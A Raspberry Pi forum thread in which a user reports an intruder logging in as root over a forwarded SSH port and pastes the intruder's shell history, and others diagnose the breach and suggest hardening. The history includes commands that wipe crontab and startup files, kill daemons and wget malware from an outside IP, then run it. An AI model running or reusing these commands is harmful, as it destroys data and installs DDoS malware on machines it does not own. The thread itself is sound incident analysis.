mystery login

[prioryjim]

I have a pi2 with Jessie.
Also on my router a port forward on a none obvious port.

Logged on this morning and it said last login was two days ago at a time I knew I would not login.
Looked like and external address.
History showed some weird commands I don't think I issued.
Will investigate further but currently pi switched off and port forward deleted.
As I remember commands were wget from some external IP. and IP tables commands.
Questions
I guess a port scanner could find the port but how do they get passed the root password ?
Should I disable root login from IP ?
Anyone seen this ?

Thanks
Jim

[mfa298]

I have a pi2 with Jessie.
Also on my router a port forward on a none obvious port.

Logged on this morning and it said last login was two days ago at a time I knew I would not login.
Looked like and external address.
History showed some weird commands I don't think I issued.
Will investigate further but currently pi switched off and port forward deleted.
As I remember commands were wget from some external IP. and IP tables commands.
Questions
I guess a port scanner could find the port but how do they get passed the root password ?
Should I disable root login from IP ?
Anyone seen this ?

Thanks
Jim

Assuming you're using raspbian have you changed the default password for the pi user. Most ssh attacks work by trying lotts of common user/password combinations.

[Heater]

Forwarding to a non-obvious port on your Pi is no help if the port open to the public on the router is the standard one.

What was that external address. If you look in /var/log/auth you should be able to find the login recorded and the IP addresss it was from.

It would be nice to know exactly what that wget command was fetching.

I presume you did change the default password and preferably changed the pi user for a different one.

Disabling root logins the net is a good idea. It removes one obvious username for attackers to try.

[prioryjim]

Yes its powered off , I will investigate in more detail tomorrow.
Thanks
Jim

[prioryjim]

A couple of logins from
root pts/1 222.33.37.154 Fri Feb 17 16:32 - 18:34 (02:02)

The commands I don't remember issuing

Code: Select all

   64  20/02/17 08:25:55 cd /tmp
   65  20/02/17 08:25:55 rm -rf .*
   66  20/02/17 08:25:55 rm -rf *
   67  20/02/17 08:25:55 service iptables stop
   68  20/02/17 08:25:55 yum -y install wget
   69  20/02/17 08:25:55 apt-get install wget
   70  20/02/17 08:25:55 rm -f /usr/bin/.sshd
   71  20/02/17 08:25:55 rm -f .17234
   72  20/02/17 08:25:55 killall -9 .17234
   73  20/02/17 08:25:55 killall -9 .sshd
   74  20/02/17 08:25:55 rm -rf /etc/crontab
   75  20/02/17 08:25:55 find ./ -name "S90*" | grep -v S90single | grep -v reboot | grep -v S90halt |xargs rm -fr
   76  20/02/17 08:25:55 ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $2}' | xargs kill -9
   77  20/02/17 08:25:55 rm -rf /usr/bin/bsd-port/getty
   78  20/02/17 08:25:55 rm -rf /usr/bin/bsd-port/*
   79  20/02/17 08:25:55 killall -9 getty
   80  20/02/17 08:25:55 wget -c http://123.249.34.199:9655/17733
   81  20/02/17 08:25:55 chmod 777 17733
   82  20/02/17 08:25:55 mv 17733 .17733
   83  20/02/17 08:25:55 wget -c http://123.249.34.199:9655/aa
   84  20/02/17 08:25:55 chmod 777 aa
   85  20/02/17 08:25:55 ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $2}' | xargs kill -9
   86  20/02/17 08:25:55 ./aa
   87  20/02/17 08:25:55 ./.17733
   88  20/02/17 08:25:55 iptables -I INPUT -s 46.105.94.61 -j DROP
   89  20/02/17 08:25:55 iptables -I INPUT -s 46.105.94.60 -j DROP
   90  20/02/17 08:25:55 iptables -I INPUT -s 198.50.134.48 -j DROP
   91  20/02/17 08:25:55 iptables -I INPUT -s 164.132.170.78 -j DROP
   92  20/02/17 08:25:55 iptables -I INPUT -s 164.132.4.3 -j DROP
   93  20/02/17 08:25:55 iptables -I INPUT -s 149.202.219.49 -j DROP
   94  20/02/17 08:25:55 iptables -I INPUT -s 183.131.83.41 -j DROP

I will reload Jessie on a new card.

I wonder what other things on my net may be compromised, Windows 10 etc.
Thanks
Jim

[rpdom]

Well, the obvious bad news is that something has got into your insecure Pi and messed things up a bit and tried to install some malware of some sorts.

The good news is that software (the aa and 13377 files) are for PC only and won't run on the ARM chip in the Pi.

Other things is has done is to disable various firewall rules (which probably weren't enabled anyway), and deleted some system files - most notably /etc/crontab, then killed any existing ssh sessions.

It may be possible to clean the system, but I wouldn't bother, I'd create a new card or go back to a clean backup of it.

I don't know what else may have happened prior to those log entries, but I don't think they managed to get beyond your Pi.

[Heater]

Interesting. I fetched the file 17733 that is shown in one of your wget commands is reported as malware by virus scanners. Not sure what yet.

Had you changed the default password before this happened?

Did you have a strong password or do you think it was short and easily guessable?

Did they log straight in as root or what?

It would be nice to know this because if they did not just guess the password they got in by some other means we might like to know about.

[mfa298]

A couple of logins from
root pts/1 222.33.37.154 Fri Feb 17 16:32 - 18:34 (02:02)

The commands I don't remember issuing

...

I will reload Jessie on a new card.

I wonder what other things on my net may be compromised, Windows 10 etc.

Looks like it came from China and tried binaries for an intel system (which shouldn't work on the Pi), so that attempt may not have done much. However that may not have been the first compromise of your Pi so it's possible other things had been put in and compromised other systems.

It looks like it's a ddos tool
https://www.virustotal.com/en/file/ab3c ... 484737930/
https://www.virustotal.com/en/file/3eb4 ... 487584080/

[prioryjim]

I usually use root and don't use any other user.
So I guess I would not change those passwords.
I changed root to a password that I don't think you could guess.
Yes they logged in as root.
I have closed my port forward.
And will create a new SD card.
And change all passwords.
Plus disable root login from net.
Any other tips ?
Thanks for the info.
Are there any files that maybe of use, I still have the SD card.
Regards
Jim

[mfa298]

then killed any existing ssh sessions.

If you're looking at this line then it's not killing ssh

Code: Select all

   76  20/02/17 08:25:55 ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $2}' | xargs kill -9

That's looking for anything that's not ssh (grep -v) and where the parent PID is 1 (awk)

That's going to kill most daemons on the system (but not ssh). If you want to see what it would match a variation is

Code: Select all

ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $0}'

[prioryjim]

Also for info
The port forward was to the standard ssh port on the pi but on the other side of the router it was a totally different port.
So I suspect they may use some form of port scanner ?
Jim

[RaTTuS]

I usually use root and don't use any other user.
So I guess I would not change those passwords.
I changed root to a password that I don't think you could guess.
Yes they logged in as root.
I have closed my port forward.
And will create a new SD card.
And change all passwords.
Plus disable root login from net.
Any other tips ?
Thanks for the info.
Are there any files that maybe of use, I still have the SD card.
Regards
Jim

1) there is no need to use root -
2) on a new card ; add a new user, setup sudo for that user, disable user pi,
3) never log in as root use sudo or su - if you really want to

[prioryjim]

Re: The good news is that software (the aa and 13377 files) are for PC only and won't run on the ARM chip in the Pi.

Given they ssh onto the system and were issuing Linux commands I wonder why they would put none Linux executables on.
And then attempt to run them with
./aa
./.17733

Thanks
Jim

[achrn]

Other things is has done is to disable various firewall rules (which probably weren't enabled anyway), and deleted some system files - most notably /etc/crontab, then killed any existing ssh sessions.

I think it hasn't deleted any firewall rules, it has added firewall rules blocking all traffic from a number of IP addresses.

[prioryjim]

Also around the time of one of the logins I note my router log had

2017-1-12 17:55:36 Kernel Informational klog 104000 104000 possible SYN flooding on port 7547. Sending cookies.

Probably connected ?

Thanks
Jim

[jondallimore]

Instead of using port forwarding, realvnc cloud or teamviewer. Or for just SSH try weaved (might have a new name now?). Keeps the router secure.

[jojopi]

I guess a port scanner could find the port but how do they get passed the root password ?

This question remains pertinent. Allowing remote root login by password is not ideal, but it should not lead to compromise unless the password is rather bad or somehow leaks out.

Allowing OpenSSH access from the internet is okay, if you need to. I would trust it more than more than any GUI-based remote-access method, and even most VPNs.

Did the attackers initially log in as root, or did they gain access by some other method first? Have they changed your root password, or installed authorized_keys for root?

Any more clues as to how many guesses it would take to brute-force or dictionary-attack the password? I have rarely seen more than a few dozen attempts before they move on to a softer target.

[mfa298]

Allowing OpenSSH access from the internet is okay, if you need to. I would trust it more than more than any GUI-based remote-access method, and even most VPNs.

Did the attackers initially log in as root, or did they gain access by some other method first? Have they changed your root password, or installed authorized_keys for root?

Without a full forensic analysis it might be hard to determine what happened. However I have seen past exploits where they've got in through some other means and then either added in something that connects out to give them shell access or they've put in a backdoored ssh daemon meaning they can bypasss the root password. These obviously require them to have had access previously but that could have been days/weeks/months/years ago, it could also occur from installing malicious software (one of the reasons that just blindly following guides is bad)

[Heater]

prioryjim,

I usually use root and don't use any other user.
So I guess I would not change those passwords.

Well, did you or did you not?

What you have written there implies that your machine still had the user "pi" and the default password for it.

In which case we perhaps know how they got in!

Yes they logged in as root.

Ultimately they did. Who knows how they got to that (Through the pi user maybe?)

An interesting point has been raise here: Did you install any software to the Pi from any place other than apt-get? Did you add any sources to your apt sources list as is often suggested in misguided installation instructions?

[Heater]

It's interesting to run those files that were fetched with wget through "strings". Oddly they are x86 Linux executables and they have not been stripped.

The "aa" file contains:

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)"

I'd never heard of TencentTraveler but it seems to be a very widely used browser in China. So we can guess where this attack comes from. This code is obviously making HTTP requests some place.

[prioryjim]

On the original install I change the root password.
It is was a word but you would be unlikely to guess it.
Probably didn't change pi password.
Most stuff was apt-get but tvheadend build from source.
Plus ftp (not sftp) , I think it was vfstp or something.
Security cam ftps images to pi. It needed root password.
ftp disabled at moment.

Is it possible the security cam (from china) has some trojen ?

Also I have the SD card if anyone needs any files to inspect.
Thanks
Jim

[B.Goode]

Probably didn't change pi password.

So I can login as pi:raspberry

Then using default powers endowed by sudo I can use passwd to set/change the password of any account on the system, or create new accounts, including root.

Game Over!

[prioryjim]

OK I failed on that !
But root password didn't change.

Any files of interest ?
Thanks
Jim

[Heater]

Lesson learned.

Probably best to reflash that SD and move on. Those files are dangerous!

What I found interesting is that whatever antivirus software is built into Win 10 now a days flagged those files as malware and automatically deleted them. Even though they are not Windows executables.

Which implies that there are binary files you cannot have on a Win10 machine. They might be harmless data but Win 10 will delete them!

[prioryjim]

OK thanks have a new SD already.

Wonder about China Web Cam ?

Jim